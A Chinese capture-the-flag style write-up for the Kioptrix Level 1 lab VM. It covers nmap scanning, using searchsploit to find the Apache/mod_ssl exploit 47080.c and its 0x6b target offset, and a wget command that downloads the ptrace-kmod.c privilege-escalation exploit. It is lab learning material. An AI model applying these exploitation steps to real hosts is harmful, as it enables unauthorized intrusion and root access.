当前位置: 首页 > news >正文

Kioptrix Level1

靶机截图

收集信息

主机发现

靶机地址为10.4.7.221

nmap -sP 10.4.7.0/24

端口扫描

nmap -sS -O -sV -p- 10.4.7.221

PORT

STATE

SERVICE

VERSION

22/tcp

open

ssh

OpenSSH 2.9p2 (protocol 1.99)

80/tcp

open

http

Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp

open

rpcbind

2 (RPC #100000)

443/tcp

open

Apache/1.3.20 (Unix)

Apache httpd 2.0.52 ((CentOS))

139/tcp

open

netbios-ssn

Samba smbd (workgroup: MYGROUP)

1024/tcp

open

status

1 (RPC #100024)

系统版本为linux 2.4.9-2.4.18

web指纹

目录扫描

dirsearch -u http://10.4.7.221

访问下随便点点看到有Apache的版本

渗透过程

根据上面的信息,搜一下exp

searchsploit Apache 1.3.20  

看着都像,一个一个试试

前两个都编译不成功,47080.c可以编译。

显示很多过滤下,前面得知为redhat,那么咱们就试下0x6a和0x6b

0x6a不行

试试0x6b,ok没毛病

提权

根据提示去下载

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

下载成功后传至靶机进行编译

总结

1.exp利用

相关文章:

  • Word之电子章制作——1
  • 计算机网络——概述
  • [特殊字符] Kolors AI中文绘画:让AI轻松“读懂”中文,创作国风新艺术
  • 【纯干货】调整word目录中的行距以及右对齐页码
  • 马斯克的 Neuralink:当意念突破肉体的边界,未来已来
  • SLAM中的非线性优化-2D图优化之零空间(十五)
  • LINUX628 NFS 多web;主从dns;ntp;samba
  • 在C++中#pragma“可选预处理指令的作用“。
  • 电商返利APP架构设计:如何基于Spring Cloud构建高并发佣金结算系统
  • 第五代移动通信新型调制及非正交多址传输技术研究与设计
  • day57python打卡
  • Sobolev space | 理论基础 / Green 公式
  • 红帽RHEL7操作系统安装
  • DOP数据开放平台(真实线上项目)
  • 【闲谈】技术债:软件开发的隐形杀手
  • debian国内安装docker
  • 8. 【Vue实战--孢子记账--Web 版开发】-- 账户账本管理
  • 变长字节的数字表示法vb224
  • 领域驱动设计(DDD)【22】之限定建模技术
  • [openwrt-21.02] T750平台增加memtester-4.1.3软件包操作说明